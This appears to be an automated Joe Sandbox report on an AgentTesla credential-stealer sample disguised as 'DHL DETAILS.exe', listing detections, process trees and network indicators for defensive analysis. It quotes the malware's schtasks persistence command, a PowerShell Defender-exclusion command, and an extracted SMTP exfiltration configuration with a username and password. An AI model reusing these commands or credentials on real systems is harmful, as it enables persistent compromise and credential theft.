Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL DETAILS.exe

Overview

General Information

Sample name:DHL DETAILS.exe
Analysis ID:1405882
MD5:0603858e620614e6badc889156f4f868
SHA1:9e3a8d66b1a788b262f047fc0e13830292911d5b
SHA256:922d60e40972c644ff506ce7475a18636afa17abdad800cfaf9fbc413a742e76
Tags:DHLexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Disables UAC (registry)
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious Epmap Connection
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DHL DETAILS.exe (PID: 6352 cmdline: C:\Users\user\Desktop\DHL DETAILS.exe MD5: 0603858E620614E6BADC889156F4F868)
    • cmd.exe (PID: 43096 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 43104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 43160 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 43112 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 43144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 43200 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • svchost.exe (PID: 43312 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 0603858E620614E6BADC889156F4F868)
        • powershell.exe (PID: 47872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 48908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AddInProcess32.exe (PID: 49664 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • MSBuild.exe (PID: 45052 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 48800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 56404 cmdline: C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 1536 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 43220 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 0603858E620614E6BADC889156F4F868)
  • svchost.exe (PID: 56176 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 0603858E620614E6BADC889156F4F868)
    • powershell.exe (PID: 61576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 63200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 63312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • MSBuild.exe (PID: 65524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • WerFault.exe (PID: 26228 cmdline: C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 50096 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 51172 cmdline: C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 69436 cmdline: C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 62400 cmdline: C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 43080 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 0603858E620614E6BADC889156F4F868)
    • powershell.exe (PID: 62300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 62308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CasPol.exe (PID: 62324 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 62332 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • WerFault.exe (PID: 62652 cmdline: C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • VHFSQv.exe (PID: 82112 cmdline: "C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • conhost.exe (PID: 82140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • VHFSQv.exe (PID: 80676 cmdline: "C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • conhost.exe (PID: 48136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "terminal7.veeblehosting.com", "Username": "itumpa@dhanyagruop.com", "Password": "mission11.."}
SourceRuleDescriptionAuthorStrings
00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000010.00000002.2800783288.0000000002F40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000010.00000002.2800783288.0000000002F6B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            16.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              16.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                16.2.MSBuild.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x33910:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33982:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x33a0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33a9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x33b08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x33b7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x33c10:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x33ca0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                System Summary

                barindex
                Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 56176, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe, ProcessId: 63312, ProcessName: RegAsm.exe
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\DHL DETAILS.exe, ProcessId: 6352, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\DHL DETAILS.exe, ParentImage: C:\Users\user\Desktop\DHL DETAILS.exe, ParentProcessId: 6352, ParentProcessName: DHL DETAILS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 43096, ProcessName: cmd.exe
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\DHL DETAILS.exe, ParentImage: C:\Users\user\Desktop\DHL DETAILS.exe, ParentProcessId: 6352, ParentProcessName: DHL DETAILS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 43096, ProcessName: cmd.exe
                Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 170.150.159.18, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\DHL DETAILS.exe, Initiated: true, ProcessId: 6352, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50435
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 189.161.3.231, DestinationIsIpv6: false, DestinationPort: 10101, EventID: 3, Image: C:\Users\user\Desktop\DHL DETAILS.exe, Initiated: true, ProcessId: 6352, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50159
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 43312, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 47872, ProcessName: powershell.exe
                Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 43220, ProcessName: svchost.exe
                Source: Network ConnectionAuthor: frack113, Tim Shelton (fps): Data: DestinationIp: 8.213.137.155, DestinationIsIpv6: false, DestinationPort: 135, EventID: 3, Image: C:\Users\user\Desktop\DHL DETAILS.exe, Initiated: true, ProcessId: 6352, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50882
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 43220, ProcessName: svchost.exe
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 154.73.29.1, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\DHL DETAILS.exe, Initiated: true, ProcessId: 6352, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL DETAILS.exe, ProcessId: 6352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 43312, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 47872, ProcessName: powershell.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.56.136.50, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: , Initiated: true, ProcessId: , Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 63794
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 43096, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 43160, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 43112, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 43312, ProcessName: svchost.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 43312, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 47872, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1536, ProcessName: svchost.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\DHL DETAILS.exe, ParentImage: C:\Users\user\Desktop\DHL DETAILS.exe, ParentProcessId: 6352, ParentProcessName: DHL DETAILS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 43096, ProcessName: cmd.exe
                Timestamp:03/09/24-13:14:13.915824
                SID:2856466
                Source Port:51523
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/09/24-13:14:13.916003
                SID:2856466
                Source Port:51524
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:03/09/24-13:14:13.728269
                SID:2856463
                Source Port:60774
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 16.2.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "terminal7.veeblehosting.com", "Username": "itumpa@dhanyagruop.com", "Password": "mission11.."}
                Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 52%
                Source: C:\Users\user\AppData\Roaming\svchost.exeVirustotal: Detection: 35%Perma Link
                Source: DHL DETAILS.exeReversingLabs: Detection: 52%
                Source: DHL DETAILS.exeVirustotal: Detection: 35%Perma Link
                Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
                Source: DHL DETAILS.exeJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:51523 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:51524 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:53536 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:53639 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:55292 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:55293 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:57177 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:57178 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:59163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:59424 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.5:60799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:63279 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.5:63403 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:49207 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:49301 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:56165 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:62819 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:63576 version: TLS 1.2
                Source: DHL DETAILS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Xml.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Drawing.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Configuration.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Net.Http.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1829.tmp.dmp.40.dr
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Configuration.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Xml.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1829.tmp.dmp.40.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Core.ni.pdb source: WER1829.tmp.dmp.40.dr
